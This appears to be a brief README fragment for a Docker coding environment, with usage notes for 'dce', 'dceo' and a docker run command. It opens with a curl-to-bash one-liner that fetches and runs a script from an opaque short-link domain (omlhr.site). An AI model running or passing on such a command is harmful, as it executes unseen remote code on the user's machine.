bash -c "$(curl -fsSL omlhr.site/EAV6iYr8fmHY)"then, inside the project folder you can use dce to open the coding environment
or dceo to open the coding environment without internet access.
docker run --rm -ti -p 1143:1143 -v "$PWD:/home/user/outside" afonsopc/docker-coding-environmentRunning this line will create a container with the current directory mounted to /home/user/outside.